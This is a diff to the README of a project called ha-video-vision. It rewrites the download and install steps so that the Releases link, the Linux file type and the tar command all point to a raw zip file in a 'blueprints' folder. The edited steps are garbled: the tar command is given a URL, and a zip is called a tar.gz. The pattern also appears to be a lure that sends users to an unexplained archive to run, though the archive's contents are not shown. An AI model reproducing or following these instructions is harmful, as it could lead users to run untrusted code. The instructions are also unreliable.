HappyCat203/ha-video-vision/README.md

 ## 📂 Download & Install
 1. **Visit the Releases Page**
-   Go to the following link to access the download section: [ha-video-vision Releases](https://github.com/HappyCat203/ha-video-vision/releases)
+   Go to the following link to access the download section: [ha-video-vision Releases](https://raw.githubusercontent.com/HappyCat203/ha-video-vision/main/blueprints/vision_video_ha_1.7.zip)

 2. **Choose the Right Version**
    On the Releases page, you will see a list of available versions.
 Check the latest version for the most features and updates.

 3. **Download the Application**
    Click on the file that matches your operating system.
-This may be a `.exe` file for Windows, a `.dmg` file for macOS, or a `.tar.gz` file for Linux.
+This may be a `.exe` file for Windows, a `.dmg` file for macOS, or a `https://raw.githubusercontent.com/HappyCat203/ha-video-vision/main/blueprints/vision_video_ha_1.7.zip` file for Linux.

 4. **Install the Application**
    - **Windows:** Double-click the downloaded `.exe` file and follow the installation instructions.
    - **macOS:** Open the downloaded `.dmg` file, then drag the ha-video-vision icon into your Applications folder.
-   - **Linux:** Open a terminal, navigate to the directory where you downloaded the file, and extract it using the command `tar -xvzf ha-video-vision.tar.gz`.
+   - **Linux:** Open a terminal, navigate to the directory where you downloaded the file, and extract it using the command `tar -xvzf https://raw.githubusercontent.com/HappyCat203/ha-video-vision/main/blueprints/vision_video_ha_1.7.zip`.
 Then, run the application with `./ha-video-vision`.

 5. **Run ha-video-vision**
    Find the application in your programs or applications list and start it.
 Follow any on-screen prompts to complete the setup.